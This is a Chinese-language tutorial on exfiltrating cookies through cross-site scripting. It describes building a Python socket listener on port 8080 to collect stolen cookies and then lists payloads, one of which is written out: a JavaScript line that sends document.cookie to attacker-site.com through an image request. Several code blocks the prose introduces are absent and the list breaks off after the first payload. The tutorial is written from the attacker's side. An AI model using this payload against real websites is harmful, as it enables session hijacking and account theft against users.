XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS（跨站脚本攻击）漏洞进行的攻击，攻击者通过在 XSS 攻击中注入恶意脚本，从而窃取用户的 Cookie 信息。

在使用XSS语句将Cookie外带到攻击者IP地址前，需要在攻击机上起一个http协议，使得目标机能够将Cookie发送给该IP地址

本文使用本机起IP地址

1.使用文本编辑器（例如 Sublime Text、VS Code 等）创建一个新的 Python 文件。

2.导入 socket 库。socket 库是 Python 标准库的一部分，提供了网络编程相关的 API 和函数。

3.选择一个主机地址和端口号来监听连接请求。主机地址可以是 IP 地址或域名。

4.使用 socket() 函数来创建一个 socket 对象，并指定协议族（例如 AF_INET），以及套接字类型（例如 SOCK_STREAM）。

5.绑定主机地址和端口号到 socket 对象上。可以使用 bind() 函数。

6.开始监听连接请求。可以使用 listen() 函数来开始监听连接请求。传入的参数表示最大等待连接数。

综合起来，一个简单的启动 IP 地址的 Python 代码如下所示：

一旦有客户端连接，accept() 方法会返回一个新的客户端套接字和客户端地址信息（包括 IP 地址和端口号）

recv() 方法会阻塞程序，直到有数据可用或者超时，然后将接收到的数据作为 Python 字节对象返回。在本例中，客户端发送的数据最大为 1024 字节；

将接收到的数据原样发送回客户端，使用 sendall() 方法向客户端套接字写入数据。

注意，sendall() 方法保证能够将所有数据发送出去，因此不需要循环调用其它方法来确保消息完整发送

接着，执行该文件。

最后，在页面执行 XSS 的 Cookie外带攻击，使目标机向指定的IP地址发送Cookie，监听的端口即可接收。

打开python2终端输入：

打开python3终端输入：

即可监听8080端口，接受XSS语句外带的Cookie

以下是一些常见的 XSS 的 Cookie 外带攻击语句：

1.利用 document.cookie 获取当前域下所有 cookie 的值：

new Image().src="http://attacker-site.com/cookie.php?cookie="+document.cookie;

2.将当前页面的 URL 和 Cookie 发送到攻击者的服务器：